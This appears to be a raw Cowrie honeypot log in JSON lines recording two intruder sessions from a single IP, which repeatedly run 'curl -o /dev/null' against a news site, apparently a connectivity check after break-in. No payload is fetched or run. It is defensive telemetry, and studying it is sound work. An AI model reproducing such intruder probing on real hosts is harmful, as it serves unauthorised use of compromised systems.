{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.033777Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.036556Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.038936Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.040038Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.043030Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.047677Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.048437Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.053235Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.058563Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.079028Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.083418Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.085252Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.087576Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.088387Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.091660Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.094582Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.096271Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.096871Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.108005Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.134794Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.136165Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.137205Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.139017Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.140174Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.143720Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.147702Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.174799Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.176207Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.181314Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.181781Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.217175Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.218013Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.220798Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.221915Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.252979Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.253791Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.260041Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.260914Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.288383Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.289123Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.298208Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.298728Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.309427Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.311147Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.345362Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.348903Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.349761Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.354745Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.356720Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.383678Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.384395Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.386865Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.392644Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.393854Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.394591Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.397012Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.406687Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.418871Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.419531Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.432726Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.433413Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.442694Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.454205Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.455235Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.458964Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.471921Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.472602Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.489874Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.491908Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.496428Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.498556Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.500799Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.501588Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.508258Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.520886Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.523752Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:22.524915Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:22.525519Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
